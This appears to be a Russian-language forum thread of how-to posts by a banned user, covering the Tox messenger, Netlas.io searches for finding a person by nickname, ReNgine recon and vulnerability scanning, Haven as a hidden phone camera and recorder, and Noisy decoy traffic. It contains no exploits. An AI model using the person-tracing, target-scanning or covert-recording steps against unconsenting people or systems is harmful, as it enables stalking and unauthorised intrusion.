Удобство в работе у всех клиентов примерно одинаковое. Вы запускаете клиент, придумываете ник, после чего генерируется Тох ID, который можно передать друзьям. Когда друзья добавят вас, вы получите уведомление; его нужно принять, чтобы установить соединение. Если друг недалеко и он использует мобильный клиент, он может добавить вас, отсканировав QR-код, содержащий Тох ID.
Как установить Tox?
Сначала необходимо скачать программу. Скачать анонимный мессенджер Tox бесплатно, с сайта разработчика вы можете по этой прямой ссылке. Там же на сайте вы можете скачать версии для Linux, OS X, Android и iOS.

Запускаем установщик. Отмечаем все галочки и жмем на кнопку ОК.

XACut40.jpeg



Настройка Tox
После запуска перейдем в настройки анонимного мессенджера.

wqYcoLU.jpeg


Теперь необходимо задать псевдоним (ник) и установить текстовый статус.

GaFiRGQ.jpeg


В следующем окне вы увидите ваш ToxID – это ваш личный идентификатор. С помощью этого ID вас смогут найти друзья. Советуем выписать его куда нибудь и сохранить.

VuhQHQQ.jpeg


Выбираем микрофон для записи и воспроизведения звука и камеру для записи видео. Там же вы можете проверить работоспособность выбранных устройств.

xxe003n.jpeg


Работа с мессенджером Tox
Для добавления нового контакта необходимо зайти в список друзей.

AprAYMO.jpeg


В появившемся окне вводим ToxID вашего собеседника и короткое сообщения. В конце нажимаем на кнопку Add.

q3pncJv.jpeg


Если кто-нибудь добавил вас — вам придет оповещение. Для подтверждения отмечаем его и нажимаем на кнопку Add.

IezNokt.jpeg


В мессенджере есть возможность конференции. Для этого в нижнем левом углу нажмите на вторую иконку.

AprAYMO.jpeg


Тох: Детоксикация общения
Мы протестировали рТох и Venom на настольном компьютере, а заодно и Antox на Android, и убедились, что разобраться в них очень легко. Текстовые сообщения работали на всех поддерживаемых платформах, так что пользователю Venom на Ubuntu можно отправлять сообщения пользователю рТох на Windows или Antox на Android.

Пользователи всех трех клиентов на настольных ПК могут совершать аудио и видеозвонки между собой, и в нашем тестовом окружении не возникало заметных задержек или искажений. Аналогично, все клиенты могут передавать файлы: мы посылали все, от мелких картинок до больших файлов ISO, и клиенты передавали их друг другу без проблем.

Но есть пара вещей, над которыми все еще ведется активная работа. Самое важное — это возможность совершать аудио и видеозвонки с Android-клиента Antox, которая пока отсутствует. Помимо этого, сейчас в групповых чатах с несколькими участниками вы можете обмениваться только текстовыми сообщениями.

Заключение
На фоне всеобщей осведомленности о безопасности в Сети всё большее число людей чувствует необходимость в защищенной связи. Разработчики Tox обещают все и сразу. И не зря, ведь Tox — сочетает в себе два основных преимущества. Во-первых, он очень удобен, как минимум на настольном ПК. Во-вторых, это не только клиент — по сути, это Р2Р-протокол для передачи шифрованных данных. На этом все. Удачи!​
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
OSINT: Как найти человека с помощью поисковика Netlas.io

8d46a3556423eeddbda526f65497c904.jpg


Вступить в наш чат

https://t.me/BlackMASTChat

Одной из наиболее распространенных задач в OSINT является сбор информации о человеке по псевдониму и/или фамилии и имени. Сегодня расскажу о методе, который не слишком популярен, но может помочь найти сайты, связанные с определенным ником или именем пользователя, на страницах, которые не индексирует Google и не могут быть найдены с помощью инструментов для поиска по нику (Maigret, Sherlock и других). Речь пойдет об использовании поисковика Netlas.io.

23590d788de3717e5501814fd37c5b0d.jpg


Поиск по нику и имени с помощью Netlas.io
Netlas.io — это инструмент для обнаружения уязвимостей и угроз безопасности, но он также может использоваться для поиска пользователей в сети.

Netlas.io также предоставляет API и интеграцию с другими инструментами, такими как Maltego.

Использование оператора “http.title”
Перейдите на сайт netlas.io, выберите третью сверху вкладку (Responses Search) и введите:

http.title:*ivanov*

994290bc981c9a6414ed6cee7c1dd0d0.png


Netlas.io использование для поиска по нику
Замените ivanov на интересующий вас ник, имя или фамилию пользователя. И не спешите убирать звездочки по бокам слова. Они нужны для того, чтобы искать не точное совпадение, а любые заголовки веб-страниц, в которых присутствует данное слово. Можно убрать одну звездочку, если вам нужны названия, начинающиеся или заканчивающиеся определенным ником.

Не нужно вчитываться в код в поле ответа. Просто откройте найденные ссылки в браузере.

Использование оператора “domain”
Этот пункт пригодится для поиск принадлежащих доменов:

domain:*ivanov*

ecce67d330fccd42594c996c8c358285.png


Netlas.io использование для поиска людей
Так можно найти домены, в названии которых присутствует определенный псевдоним.

Использование оператора “http.body”
А этот запрос ищет весь текст страницы вместо заголовка. Обратите внимание, что я не использую здесь звездочки, поскольку такой поиск работает медленнее, и для начала лучше искать только точные совпадения.

http.body:soxoj


e17f5244572ac4c5aa3a155d226f57e1.png


Netlas.io использование в OSINT
Этот способ подходит для поиск упоминаний о человеке на сайтах. Но, на мой взгляд, он работает хуже, чем поиск по названию или домену. Используйте его в сочетании с другими инструментами.

Символы (* и ?) и регулярные выражения Netlas
А теперь еще одно важное преимущество Netlas перед обычными поисковыми системами, такими как Google. Если вы не знаете точно, как пишется ник (например, sn0b или snob), вы можете заменить один символ на знак вопроса (или звездочку, если вы не уверены в нескольких символах).

85c90ebf1ebaad506081e6dedb67fe30.png


Netlas.io поиск человека
Они также поддерживают некоторые элементы синтаксиса регулярных выражений, что открывает дополнительные возможности поиска.

Хотелось бы также обратить ваше внимание на то, что при поиске по псевдониму следует проявлять творческий подход и проверять не только основное написание, но и использовать альтернативные символы ($ вместо S и т.д.).

Заключение
Не стоит забывать, что большинство задач OSINT можно автоматизировать. И Netlas — не исключение. Он может помочь найти много дополнительной информации о человеке, но не все упоминания о нем в Интернете. Если вы хотите получить максимальное количество данных, используйте другие инструменты и другие методы поиска по нику.​
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
OSINT-разведка с помощью ReNgine

4a9f829f016194526cf904d50c0cdefd.jpg


Вступить в наш чат

https://t.me/BlackMASTChat

OSINT-разведка может занять очень много времени, если делать её вручную, не говоря уже о систематизации полученных результатов. К счастью, существует ReNgine, который может существенно упростить вашу работу. Итак, сегодня мы вам расскажем, как его установить и использовать.

31aaec74a43b68144bceeab9a233cbd3.jpg


Что такое ReNgine?
ReNgine — это инструмент OSINT для сбора информации при пентесте, с возможностью непрерывного мониторинга и простым, но интуитивно понятным пользовательским интерфейсом. ReNgine упорядочивает и сохраняется полученную информацию в базе данных. Таким образом, вы всегда можете получить доступ к результатам сканирования. Кроме того, вы можете включить непрерывный мониторинг цели, запуская сканирования с заданными интервалами.

3fe6e876e4e8c5d1d926800b6242ba9c.jpg


Панель управления
Установка и настройка ReNgine
Устанавливать будем с репозитория GitHub:

git clone https://github.com/yogeshojha/rengine && cd rengine
Отредактируйте файл окружения изменив пароль по умолчанию:

nano .env
Запустите сценарий инициализации:

sudo ./install.sh
Этот сценарий установит, настроит и запустит все необходимые контейнеры для запуска ReNgine. Во время установки тулза предложит создать имя пользователя и пароль. Сохраните их, они понадобятся для входа в пользовательский интерфейс.

Введите в браузере https://127.0.0.1, чтобы начать использовать ReNginе.

8a16f6c176f80805dd2861fd0dc6260b.jpg


Использование ReNgine
Давайте проведем наше первое сканирование.

Шаг 1. Создайте цель.
Перейдите на вкладку целей и добавьте новую цель. Введите имя домена и, если хотите, описание.

d9e20cd44d9e3027fb4c8044d59a68d7.jpg


Добавление цели

f7cbbc59a3d9c62e750471bee80ed4a1.jpg


Список целей
Шаг 2. Выполните первое сканирование
Щелкните по значку молнии рядом с целью, чтобы начать сканирование. В моем случае я буду сканированить поддомены.

c03523b131d3b2614080db08049cc113.jpg


Запуск сканирования


a3754089c0fa6d3bc56e774979361b57.jpg


Шаг 3. Оценка результатов
После завершения сканирования вы можете просмотреть все результаты. Обратите внимание, что в этом случае мы провели только сканирование поддоменов, однако этот инструмент способен на большее.

f235235099d1a5193c5eba7d961bc7cd.jpg


Результат
Давайте рассмотрим еще несколько функций, которые может предложить ReNgine.
Сканирование уязвимостей с помощью Nuclei (настраиваемое);
Параллельное сканирование;
Визуализация данных;
Настраиваемые механизмы сканирования;
Возможности OSINT;
Поддержка прокси.
Более подробное объяснение можно найти в репозитории GitHub по адресу https://github.com/yogeshojha/rengine.
ReNgine — это мощный инструмент OSINT, который поможет выполнить задачи за считанные минуты.​
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
549751ce5df08f17518707e26ff4a0d0.jpg


Наверняка у каждого из вас есть как минимум один старый Аднроид-телефон. И если вы не знаете куда его деть, у нас есть интересное предложение для вас — сделать из него скрытый диктофон и скрытую камеру наблюдения с детектором движения и возможностью записи происходящего.

c76c87b6b8944cd12e5ac2532e31c351.jpg
[/IMG]

Система наблюдения из старого телефона
Вы наверное подумали про себя: «Ну да конечно, нашли, чем удивить. Ведь всего этого добра полно в маркете Google Play». И вы в чем — то правы, но только частично. Приложение которое делает камеру видеонаблюдения из телефона называется Haven, и разница между ним и другими похожим заключается вот в чем:

Рекомендовано самим гуру анонимности и приватности Эдвардом Сноуденом, проектом Guardian и Freedom of the Press Foundation.
Не хранит записанную информацию на серверах принадлежащих непонятно кому.
Имеет открытый код и доступен для скачивания, который скорее всего скоро подвергнут аудиту.
Приложение Эдварда Сноудена Haven
Существует огромное количество гаджетов для защиты дома и имущества. Но зная, что ваша собственность контролируется системами безопасности, всегда существует основная проблема конфиденциальности. Так как эти устройства могут записывать аудио и видео, есть вероятность, что записи попадут в чужие руки. Если вы не хотите чтобы ваши данные использовались другими (в самом безобидном случае маркетинговыми компаниями), то вам необходимо убедиться, что ваша конфиденциальность соблюдается.

Haven — это бесплатное приложение с открытым исходным кодом для операционной системы Андроид, которое превращает любое Android-устройство в систему безопасности, с акцентом на конфиденциальность, одобренную Эдвардом Сноуденом, проектом Guardian и Freedom of the Press Foundation. Haven будет работать на любом Android-телефоне, даже на старом и недорогом. Приложение работает как система наблюдения, используя камеру устройства, микрофон и даже акселерометр для обнаружения движения.

Применений у данного приложения множество. Оставив ноутбук в сейфе гостиницы и разместив рядом с ним телефон можно настроить Хейвен на трансляцию звука и движения. Если кто-нибудь откроет сейф, он будет сфотографирован, будет записан звук, и вы получите оповещение на телефон. Оповещения могут быть отправлены через SMS, Signal или через Tor.

Основная идея Haven проста: превратите любое устройство на базе Android в домашнее устройство безопасности и используйте датчики устройства для этой задачи. Haven записывает только тогда, когда что-то происходит, а не непрерывно, и сохраняет данные на локальном устройстве, а не на сервере где-то в облаке.

В текущей версии Haven использует следующие датчики:

Акселерометр: движение и вибрация телефона
Камера: движение в видимом окружении телефона с передней или задней камеры
Микрофон: шум окружающей среды
Свет: изменение света от датчика освещенности
Установка Haven
Перейдите на сайт Google Play.
Нажмите кнопку установить.
Запустите приложение тапнув по ярлыку на рабочем столе.
Настройка Haven
После запуска вас попросят установить пороговые значения для звука и движения, и вам нужно провести некоторое тестирование, чтобы уменьшить ложные срабатывания. При правильной настройке вы исключите постоянные шумы и движения, такие как звук работающего холодильника или появление вашего кота.

Также приложение Haven предложит связать ваше устройство путем добавления номера на который будете получать уведомления. Вы не обязаны это делать, но в таком случае все будет сохраняться только локально в память устройства.

Haven использует сквозное шифрование для защиты данных. Пользователи, которые хотят еще больше безопасности, могут использовать для этого сеть Tor.

Стоит ли использовать Haven?
Данное приложение делает особый акцент на конфиденциальность пользователя. За это разработчикам большой респект! Поэтому скачиваете без сомнений и пробуйте его в деле. На этом все. Удачного использования!​
 
Внимание: этот пользователь заблокирован! Настоятельно рекомендуем воздержаться от любого сотрудничества с ним!
Как скрыть трафик от провайдера с помощью Noisy

f08ab7af6d5b05dbf56b06dadd7e6459.jpg


Скрыть данные от провайдера можно разными способами, например, с помощью надежного VPN-сервиса, но есть и альтернативный способ: программа Noisy, разработанная израильским программистом Итаем Хари, которая может закидать вашего интернет-провайдера случайными HTTP/DNS-запросами (т.е. если даже данные будут перехвачены, они не будет представлять особой ценности).

f7314ef42159cff01a286581677d24a2.jpg


Сетевой нейтралитет
Если вы не знакомы с термином «Сетевой нейтралитет», попробую вас быстренько ввести в курс дела.

Провайдер на законных основаниях может собирать и анализировать информацию о деятельности пользователя в сети без получения согласия. На практике это означает, что будут собираться IP-адреса, которые с легкостью могут быть преобразованы в физическое местонахождение, историю посещения сайтов и содержимое страниц, просмотренных вне протокола HTTPS, включая информацию, отправленную через веб-формы. В фонде электронных рубежей (Electronic Frontier Foundation; EFF) полагают, что интернет-провайдеры могут пойти еще дальше и начать продавать собранную информацию третьим лицам.

Сокрытие данных от провайдера с помощью Noisy
Для сокрытия данных от провайдера нам поможет утилита Noisy, представляющая собой простой скрипт, написанный на Python. Он может генеририровать случайный HTTP/DNS-трафик в фоновом режиме, в то время когда вы посещаете сайты. Таким образом, ваша информация теряет уникальность, становится бесполезной для маркетологов и компаний, занимающихся анализом подобного рода сведений.

Идеи, реализованные в скрипте Noisy, не являются чем-то новым, и были подчерпнуты из инструмента Squawk, представляющего собой скрипт, встраевымый в веб-страницы для отсылки дополнительных случайных запросов. Однако Noisy проще использовать и модифицировать.

Рассмотрим пошагово, как работать с Noisy.

Установка зависимостей
У вас должен быть установлен Python. В Kali Linux все необходимое уже есть по умолчанию. Noisy совместим с версиями 2.7 и 3.6. Для проверки версии Python в вашей системе введите следующую команду:

python -V

В Noisy используется модуль Requests, который можно установить при помощи следующей команды:

pip install requests
Кроме того, еще большую пользу от Noisy можно получить, если установить Docker, поскольку в этом случае вы сможете изолировать трафик в ограниченной среде как отдельный канал. Однако использование Docker не является обязательным.

Клонирование Noisy из GitHub
После того как Python и все нужные зависимости установлены, загружаем Noisy из репозитория при помощи команды git:

git clone https://github.com/1tayH/noisy.git
Альтернативный вариант: зайти в репозиторий и загрузить .zip файл. Вначале нажмите на кнопку «Clone or download» и в открывшемся контекстном меню выберите пункт «Download ZIP». После загрузки распакуйте содержимое архива.

Знакомство с конфигурационным файлом
Теперь нужно отредактировать конфигурационный файл. Несмотря на то, что для корректной работы Noisy изменять настройки не требуется, попутно мы сможем разобраться, как работает программа. Вначале переходим в директорию с распакованным архивом при помощи команды cd:

cd noisy
Затем откройте файл config.json в вашем любимом текстовом редакторе. В качестве примера используем Vim:

vim config.json
Альтернативный вариант: на рабочем столе зайти папку «Files», а затем в директорию «noisy» и открыть файл config.json в редакторе Notepad++.

Информация в файле хранится в формате JSON. Noisy берет первый адрес из списка «root_urls» и ждет случайное время в диапазоне между «min_sleep» и «max_sleep» (в секундах) перед тем, как кликнуть на случайную ссылку на странице. Глубина просмотра указана в параметре «max_depth». После завершения просмотров страниц на текущем сайте, берется следующий адрес из списка и так далее.

Как вы могли заметить, есть некоторые особенности, связанные с настройками. Во-первых, в списке «root_urls» всего 11 адресов. Во-вторых, при посещении некоторых сайтов в вышеуказанном списке могут возникнуть проблемы.

При посещении сайтов содержимое не показывается на экране, но может привлечь внимание того, кто занимается мониторингом локальной сети или в случае, если просмотр этих сайтов запрещен настройками прокси-сервера. Короче говоря, отредактируйте этот список на ваше усмотрение. Чем больше будет добавлено адресов, тем более случайным будет трафик.

Поскольку в файле config.json мало адресов, весь список будет пройден за не очень большое время. Как итог, потенциально может появиться опознаваемый кусок информации, который легко будет отфильтрован.

Добавление сайтов в конфигурационный файл
Чтобы избежать вышеупомянутой проблемы, я создал альтернативный конфигурационный файл. Я решил, что миллиона адресов будет вполне достаточно, загрузил первый миллион сайтов из рейтинга Alexa и прогнал этот список более пяти раз через простейший скрипт-рандомизатор, написанный на Python. Полученный перечень был скопирован в файл config.json. Теперь трафик, генерируемый утилитой Noisy, будет более случайным.

Мой конфигурационный файл размером более 25 Мб можно загрузить, если зайти на GitHub-страницу и либо кликнуть правой кнопкой мыши на кнопку «Download» и в контекстном меню выбрать «Save Link As», либо нажать на кнопку «Download», после чего содержимое файла загрузится в браузере, и вы сможете сохранить страницу. После загрузки не забудьте заменить оригинальный конфигурационный файл в папке «noisy».

Если вы решите сделать свой собственный список сайтов, помните, что информация хранится в формате JSON, и каждый адрес должен быть заключен в двойные кавычки с запятой на конце. Кроме того, я всегда добавляю префикс https://, чтобы вначале попробовать зайти на сайт через протокол HTTPS. Пример:

"https://website.com",
Рандомизация трафика
После обновления файла config.json все готово для рандомизации трафика. При помощи команды cd зайдите в директорию noisy и запустите скрипт noisy.py с аргументом в виде конфигурационного файла:

cd noisy
python noisy.py --config config.json
После запуска этой команды начнется генерация случайного трафика. Если все работает корректно, вы должны увидеть исходящий поток различных адресов как в примере ниже:

INFO:root:Visiting https://azerbaijantourism.az/about
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): azerbaijantourism.az
INFO:root:Visiting https://azerbaijantourism.az/
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): azerbaijantourism.az
INFO:root:Visiting https://azerbaijantourism.az/booking-conditions
INFO:requests.packages.urllib3.connectionpool:Starting new HTTPS connection (1): azerbaijantourism.az
Чтобы остановить скрипт, нажмите комбинацию клавиш Ctrl-C.

Другие параметры в Noisy
Когда Noisy не запущен, используйте аргумент h или help для ознакомления с другими опциями, как, например, установка таймаута.

python noisy.py –help
Полный перечень аргументов:

[crayon-67113f346df6f629083563 inline="true" ]noisy.py [-h] [--log -l] --config -c [--timeout -t]
[/crayon]

опциональные аргументы:

-h, —help справка
—log -l уровень логирования событий
—config -c файл настройки
—timeout -t продолжительность работы паука в секундах
Запуск Noisy через Docker (необязательно)
Как говорилось выше, можно поместить Noisy в контейнер на базе Docker при помощи следующей команды (но вначале нужно установить Docker):

docker build -t noisy .
Вы даже можете сделать сборку для устройства Raspberry Pi с операционной системой Raspbian, если хотите вынести рандомизатор трафика в отдельное место.

docker build -f Dockerfile.pi -t noisy .
После того как сборка выполнена, запуск осуществляется при помощи следующей команды:

docker run -it noisy --config config.json
Увеличение объемов случайного трафика (необязательно)
Изучая конфигурационный файл, вы могли заметить, что задержка устанавливается в секундах. Сей факт означает, что наименьшая задержка может быть равна одной секунде, если настроить конфигурацию так:

"min_sleep": 0,
"max_sleep": 1,
В некоторых случаях этой задержки может быть недостаточно, как, например, в ситуациях, когда в вашей сети много людей, и нужно генерировать большие объемы случайного трафика.

Используя Docker-compose, мы можем запустить одновременно несколько контейнеров для генерации неограниченных объемов трафика. Нужно зайти в папку examples, собрать новый образ и запустить сборку на том количестве контейнеров, которое вам необходимо:

cd examples/docker-compose
docker-compose build
docker-compose up --scale noisy=<number-of-containers>
Однако в этом случае нужно отслеживать количество генерируемого трафика, поскольку при большом количестве работающих контейнеров может замедлиться скорость интернета. Кроме того, если у вас есть ограничения по трафику, нужно очень внимательно следить за тем, сколько генерируется случайных данных.

Как вы могли убедиться, Noisy – чрезвычайно простая утилита, и после некоторых настроек, вы получаете невероятно мощный инструмент, который должен стать вашим повседневным инструментом, если вы заботитесь о своей конфиденциальности.​
 
Назад
Сверху